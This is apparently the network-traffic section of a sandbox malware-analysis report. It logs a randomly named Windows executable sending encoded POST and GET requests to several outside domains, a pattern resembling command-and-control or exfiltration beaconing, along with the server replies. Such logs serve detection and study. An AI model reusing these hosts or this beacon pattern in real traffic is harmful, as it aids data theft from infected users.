                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 72 79 3d 6e 6a 32 30 58 72 26 6c 74 3d 49 75 66 65 6c 62 55 43 54 4b 4f 65 75 77 4d 4e 35 45 55 71 66 36 54 42 36 63 6b 65 58 36 62 49 78 31 74 64 35 63 33 35 65 79 56 62 43 47 33 49 7a 79 49 4b 6a 6e 33 53 57 30 61 67 70 78 65 73 4b 39 57 35 59 48 6d 33 76 54 30 41 46 46 6a 59 31 4d 54 37 6b 6d 73 53 42 6a 66 6d 53 44 2f 67 4c 33 46 47 48 51 67 6d 2f 68 66 4f 2b 65 5a 66 2b 5a 38 68 66 36 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3ry=nj20Xr&lt=IufelbUCTKOeuwMN5EUqf6TB6ckeX6bIx1td5c35eyVbCG3IzyIKjn3SW0agpxesK9W5YHm3vT0AFFjY1MT7kmsSBjfmSD/gL3FGHQgm/hfO+eZf+Z8hf6A="}</script></head></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        21 | 192.168.2.4 | 49763 | 13.248.169.48 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:04.584727049 CEST | 753 | OUT | POST /pjne/ HTTP/1.1
                        Host: www.dyme.tech
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.dyme.tech
                        Referer: http://www.dyme.tech/pjne/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6f 6a 42 57 44 2f 34 44 38 48 54 59 5a 4a 39 4e 42 6a 53 36 6d 62 7a 69 48 7a 57 4d 2b 56 6b 6e 35 6c 36 41 39 78 78 74 64 6b 56 58 6b 71 4b 68 30 30 6b 69 4c 44 58 32 44 65 47 50 67 4f 4a 33 65 41 71 4b 42 6d 59 77 4b 35 68 66 59 59 78 4e 71 57 52 6c 70 43 41 64 49 44 4c 64 41 6e 30 41 66 71 75 63 43 62 2b 76 6b 76 38 71 47 73 31 52 67 6f 4d 37 67 41 4e 51 4a 30 31 59 69 33 49 6e 71 44 54 76 6f 74 53 51 39 6a 62 69 47 54 41 35 6f 41 50 57 53 68 79 77 39 79 7a 77 46 72 61 32 36 69 6b 61 41 41 67 37 7a 4b 71 61 7a 75 6c 59 4f 55 2f 4d 51 2b 59 38 43 37 71 56 58 4d 66 31 4f 67 3d 3d
                        Data Ascii: lt=ojBWD/4D8HTYZJ9NBjS6mbziHzWM+Vkn5l6A9xxtdkVXkqKh00kiLDX2DeGPgOJ3eAqKBmYwK5hfYYxNqWRlpCAdIDLdAn0AfqucCb+vkv8qGs1RgoM7gANQJ01Yi3InqDTvotSQ9jbiGTA5oAPWShyw9yzwFra26ikaAAg7zKqazulYOU/MQ+Y8C7qVXMf1Og==


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        22 | 192.168.2.4 | 49764 | 13.248.169.48 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:07.139619112 CEST | 773 | OUT | POST /pjne/ HTTP/1.1
                        Host: www.dyme.tech
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.dyme.tech
                        Referer: http://www.dyme.tech/pjne/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6f 6a 42 57 44 2f 34 44 38 48 54 59 5a 71 31 4e 44 41 36 36 7a 72 7a 6a 4c 54 57 4d 30 31 6b 6a 35 6c 2b 41 39 7a 64 39 65 52 4e 58 6c 4f 4f 68 31 78 59 69 4b 44 58 32 62 4f 47 4b 2b 2b 4a 38 65 41 76 35 42 69 51 77 4b 35 31 66 59 61 70 4e 71 68 6c 69 6f 53 41 66 46 6a 4c 66 50 48 30 41 66 71 75 63 43 62 71 4a 6b 76 6b 71 47 38 6c 52 67 4a 4d 36 2b 77 4e 66 4b 30 31 59 30 48 4a 75 71 44 54 5a 6f 75 58 4c 39 67 6a 69 47 54 77 35 70 56 6a 52 62 68 79 79 77 53 79 78 46 35 72 6c 7a 69 35 36 49 51 49 46 74 62 33 37 79 6f 30 43 66 6c 65 62 43 2b 38 50 66 38 6a 68 61 50 69 38 56 6a 6d 74 67 64 6d 32 6b 74 74 77 71 30 72 6a 6e 69 41 66 36 2b 49 3d
                        Data Ascii: lt=ojBWD/4D8HTYZq1NDA66zrzjLTWM01kj5l+A9zd9eRNXlOOh1xYiKDX2bOGK++J8eAv5BiQwK51fYapNqhlioSAfFjLfPH0AfqucCbqJkvkqG8lRgJM6+wNfK01Y0HJuqDTZouXL9gjiGTw5pVjRbhyywSyxF5rlzi56IQIFtb37yo0CflebC+8Pf8jhaPi8Vjmtgdm2kttwq0rjniAf6+I=


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        23 | 192.168.2.4 | 49765 | 13.248.169.48 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:09.684768915 CEST | 10855 | OUT | POST /pjne/ HTTP/1.1
                        Host: www.dyme.tech
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.dyme.tech
                        Referer: http://www.dyme.tech/pjne/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6f 6a 42 57 44 2f 34 44 38 48 54 59 5a 71 31 4e 44 41 36 36 7a 72 7a 6a 4c 54 57 4d 30 31 6b 6a 35 6c 2b 41 39 7a 64 39 65 53 74 58 6b 37 61 68 31 57 4d 69 4a 44 58 32 54 75 47 4c 2b 2b 4a 68 65 41 58 6d 42 69 63 4b 4b 39 46 66 59 2f 31 4e 73 55 4a 69 78 43 41 66 61 7a 4c 43 41 6e 31 4b 66 71 2b 59 43 62 36 4a 6b 76 6b 71 47 2b 74 52 33 49 4d 36 38 77 4e 51 4a 30 31 55 69 33 49 48 71 44 36 73 6f 76 6a 62 2b 52 44 69 47 33 55 35 76 6e 37 52 44 78 79 30 38 79 7a 69 46 35 6d 39 7a 69 56 49 49 51 4d 76 74 62 54 37 7a 2b 35 4b 49 6d 53 59 51 74 41 4c 64 4f 6a 62 44 63 79 4d 54 79 53 32 6d 4a 43 50 7a 75 31 36 6e 6d 57 4d 31 78 63 4c 6f 49 4c 73 62 61 2b 4d 52 4c 54 68 61 4a 4e 6c 38 4d 41 53 77 47 69 6e 68 4c 64 70 38 34 4d 74 32 65 48 73 52 57 7a 6a 6e 52 56 47 6b 6b 67 37 53 55 45 51 7a 4e 7a 4f 2f 6c 75 75 64 6a 74 65 39 63 4c 61 6b 49 32 7a 32 4b 69 6d 65 5a 65 2f 6c 75 4b 4b 71 48 6b 5a 54 79 47 78 38 4d 45 69 6b 68 52 70 72 35 76 37 52 6a 31 6e 78 41 32 76 6e 32 73 4e 37 45 55 76 72 53 75 [TRUNCATED]
                        Data Ascii: lt=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 [TRUNCATED]


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        24 | 192.168.2.4 | 49766 | 13.248.169.48 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:12.226533890 CEST | 490 | OUT | GET /pjne/?lt=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&3ry=nj20Xr HTTP/1.1
                        Host: www.dyme.tech
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:53:12.697207928 CEST | 389 | IN | HTTP/1.1 200 OK
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:53:12 GMT
                        Content-Type: text/html
                        Content-Length: 249
                        Connection: close
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 74 3d 6c 68 70 32 41 4c 31 6f 38 57 6e 62 58 50 5a 4d 52 77 75 4e 77 5a 50 73 43 6a 47 4d 69 6d 41 79 74 69 58 48 36 6e 30 75 57 54 64 41 30 4a 61 61 79 6b 67 67 47 42 76 5a 55 64 4b 2f 75 64 68 61 4d 67 75 6c 51 53 78 69 53 62 6c 2b 44 49 70 49 6f 31 67 51 76 68 45 7a 4a 51 43 67 4b 47 4a 49 62 4b 6d 45 47 63 2b 37 70 62 67 79 51 70 74 54 70 49 56 71 72 57 67 3d 26 33 72 79 3d 6e 6a 32 30 58 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lt=lhp2AL1o8WnbXPZMRwuNwZPsCjGMimAytiXH6n0uWTdA0JaaykggGBvZUdK/udhaMgulQSxiSbl+DIpIo1gQvhEzJQCgKGJIbKmEGc+7pbgyQptTpIVqrWg=&3ry=nj20Xr"}</script></head></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        25 | 192.168.2.4 | 49767 | 185.134.245.113 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:17.744648933 CEST | 777 | OUT | POST /3cch/ HTTP/1.1
                        Host: www.lilibetmed.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.lilibetmed.online
                        Referer: http://www.lilibetmed.online/3cch/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=OTKrJrPoX9Ljb4hS27BcB1z7MRNiKo2ToeE8M7aOMGls0iKSfGxk/6jVimDg/gy5KrDkEst5WGHxyLHd/ZRNCcDyrScxLcxdhsjtjWkSHwZu0S1QwVJkPmIS8QOPur6kSxaXWlyVvLV1X5awZCfSJmDMQCwS+cgHzX/XoUILripL0Ff1qC7ku5Qnsbqm+3MnBA==
                        Sep 9, 2024 04:53:18.391100883 CEST | 716 | IN | HTTP/1.1 405 Not Allowed
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:18 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        26 | 192.168.2.4 | 49768 | 185.134.245.113 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:20.293540001 CEST | 797 | OUT | POST /3cch/ HTTP/1.1
                        Host: www.lilibetmed.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.lilibetmed.online
                        Referer: http://www.lilibetmed.online/3cch/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=OTKrJrPoX9LjYb5S1c1cHVz4QBNiDI2Xoe48M6ueMQ1s0GOScEZk46jVqGDliQyyKrOZEu55WGTxyK3d/qpODMD8+CczWsxdhsjtjWw4H09u0jFQzwplR2IR5gOP4b7vSxa5WkervNZ1X8+wYTfTcWDOPSxa5cUC+iWWgHwIy20uxDOv7zaz850UxcjSz0xuaCOqc3PyXkZh746FCKTXDyE=
                        Sep 9, 2024 04:53:20.935451984 CEST | 716 | IN | HTTP/1.1 405 Not Allowed
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:20 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        27 | 192.168.2.4 | 49769 | 185.134.245.113 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:22.840871096 CEST | 10879 | OUT | POST /3cch/ HTTP/1.1
                        Host: www.lilibetmed.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.lilibetmed.online
                        Referer: http://www.lilibetmed.online/3cch/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt= [TRUNCATED]
                        Sep 9, 2024 04:53:23.485428095 CEST | 716 | IN | HTTP/1.1 405 Not Allowed
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:23 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Ascii: 228<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        28 | 192.168.2.4 | 49770 | 185.134.245.113 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:25.387787104 CEST | 498 | OUT | GET /3cch/?3ry=nj20Xr&lt=DRiLKdz0S/bqEudf8+lJZmKhIEkCV4eCneZlIdHidh1UyVXSe2F494jKrmXjvhSAferATdA1WGLj27vrwJsZD/LqvQNnepl3kdPcsh0FNk4E92FpuHIxGGI= HTTP/1.1
                        Host: www.lilibetmed.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:53:26.012362003 CEST | 1236 | IN | HTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:25 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Expires: Mon, 09 Sep 2024 03:53:25 GMT
                        Cache-Control: max-age=3600
                        Cache-Control: public
                        Data Ascii: 153f<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.lilibetmed.online is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.log
                        Sep 9, 2024 04:53:26.012377977 CEST | 1236 | IN | Data Ascii: o { width: auto; max-height: 50px; margin-top: 30px; border: 0; } .logocont { text-align: center; } .langselect { position: absolute; top: 10px; right: 1
                        Sep 9, 2024 04:53:26.012388945 CEST | 1236 | IN | Data Ascii: ive website here. <br>Other services, such as e-mail, may be actively used by the owner.<br><br><a href="https://www.domainnameshop.com/whois">Who owns the domain?</a>', no: punycode.toUnicode('www.lilibetmed.online') + ' er registrert
                        Sep 9, 2024 04:53:26.012435913 CEST | 1236 | IN | Data Ascii: var i = typeof SVGRect != "undefined" ? "svg" : "png"; function q(s) { return document.getElementById(s); } </script> <div class="container"> <h1 id="t"> www.lilibetmed.online is park
                        Sep 9, 2024 04:53:26.012445927 CEST | 766 | IN | Data Ascii: img src="/images/flag-en.png" alt="English" title="English" onclick="setLang('en')" /> </div> </div> <div class="footer"> <span >Domeneshop AS &copy; 2024</spa


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        29 | 192.168.2.4 | 49771 | 103.42.108.46 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:31.381803989 CEST | 756 | OUT | POST /pn1r/ HTTP/1.1
                        Host: www.mbwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.mbwd.store
                        Referer: http://www.mbwd.store/pn1r/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=tIPs8k8l6Jqf3FRKPp7IogLTvnzJiXdM60Nb2BfLwT5FrIuy3/JH2WEoEhUJAtWYoKy1el1mQ4qPh5GkwX2WqBvQ8/aUkkyUFG0jZS1ZYiS2GdTvISYoZa8Oz+PSn6s4iu0aYSuF1oqqmUKe79lDioL1efKJyF0vH8bzO43dWyVZy7jLq3mjZ6H4oI8pCmivuw==
                        Sep 9, 2024 04:53:32.245316982 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                        Content-Type: text/plain; charset=utf-8
                        Date: Mon, 09 Sep 2024 02:53:32 GMT
                        Content-Length: 11
                        Connection: close
                        Data Ascii: Bad Request


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        30 | 192.168.2.4 | 49772 | 103.42.108.46 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:33.943371058 CEST | 776 | OUT | POST /pn1r/ HTTP/1.1
                        Host: www.mbwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.mbwd.store
                        Referer: http://www.mbwd.store/pn1r/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=tIPs8k8l6JqflxVKc+vItALcz3zJs3dI60xb2EvbxhNFrqmy0+JH72EoPBUGddWloK+TegVmQ7WPh9CkxgaXpxvO1faFgkyUFG0jZSgEYiK2Hu7vPDYnFK8Bw+PS1Ks8iu04YQKr1qSqmRue7slMtoLJafL2+0RGBdz7Gau9WiA7z9yR7GH0L6jL1P1dPlfm1/M8caH3z5O2Frz7k8gwrL4=
                        Sep 9, 2024 04:53:34.811379910 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                        Content-Type: text/plain; charset=utf-8
                        Date: Mon, 09 Sep 2024 02:53:34 GMT
                        Content-Length: 11
                        Connection: close
                        Data Ascii: Bad Request


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        31 | 192.168.2.4 | 49773 | 103.42.108.46 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:36.491148949 CEST | 10858 | OUT | POST /pn1r/ HTTP/1.1
                        Host: www.mbwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.mbwd.store
                        Referer: http://www.mbwd.store/pn1r/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=tIPs8k8l6JqflxVKc+vItALcz3zJs3dI60xb2EvbxhVFoYeymdhH62EoChUFddW0oJOfegR2Q+SPheKk2VuX+BvO3fbCkkzMFGlkZRYEYiK2Hr/vZCYnW68Oz+PWn6triusCYQeV0Zaqnx+e36JMkoLPdfLu+0tdBduAGbbqWgc7wqPao3Xydb/2g8RkN1bKseMlMKqvs5WUOrq1/sknxvGEGIbSEMzT/mgyIB9YbBlS9Kpqo9XcMf+8jWULFGqY2WhGwTaMJCAemxo3S9Wt1Gcle5NZ+qzK94hrvR3tFXQNkATf3dY1/vzE4PHCZMvGBS1TekAWIj34VAC3I7p+9mf5Ghc/4zmrfX8I55sCPMDJDHDJXigt33cTjo9YP9O+2riGduBc9NgBXcKV6VxRlQcrIOSX2uAaaV6js1RJdKW5iKGWPWZUXuBUSeKsNNwpi54JL1kcsGimRfZ6Q0zaazRN9055rOS62JPP0bESIV2JyMtsml+60dZjpHtOqboJdwsCRcrt4RqBcS7QYIXG+ZA9DQMg9SkBKmrPb1k2jWKr1F5dDo9HbbF5iZO/dXCu1GY+Xa150DYdTx7OCdxIHudaXFISkP4VB9NopteBAssBttW7FNw7MdaSHJuDgXZ189c1ozDChed8PbE4+j4LktAeJp0nI4aNfYvXCvqS2Rs9w8ZjFmXIkCUYWEbL6+Qkz3ry/E3NAYNV1lIL7jicVi3PCv0z41zhweLdltEHDax5qDx9HhQXFD+OfX9cO8eeE+YJal4IIQoaXiM7kxvWZ675KVkvgjzfH9tgrGaghNf/GynUHnE4k0bG6HV2LRmejYLklO3rD1e5SiNclLoq0dvSJEB7EFo3inKL9vBYQpsCL5vH430vk3B4Gk09i/OVzDi3uz/4n28cMhw23MgtVGxTMyGMfHmFWhDeLayZjCZF155zhjGA7tlHjYtMSxag0Ji4eOo/5coPgT/3G6qqmjTZCyIF6X3n+2Xj/U1D+BoHGKMBy [TRUNCATED]


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        32 | 192.168.2.4 | 49774 | 103.42.108.46 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:39.041815042 CEST | 491 | OUT | GET /pn1r/?lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr HTTP/1.1
                        Host: www.mbwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:53:39.898190022 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                        Content-Type: text/plain; charset=utf-8
                        Date: Mon, 09 Sep 2024 02:53:39 GMT
                        Content-Length: 11
                        Connection: close
                        Data Ascii: Bad Request


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        33 | 192.168.2.4 | 49775 | 38.55.112.70 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:53.483823061 CEST | 756 | OUT | POST /dw6h/ HTTP/1.1
                        Host: www.fvti.cloud
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.fvti.cloud
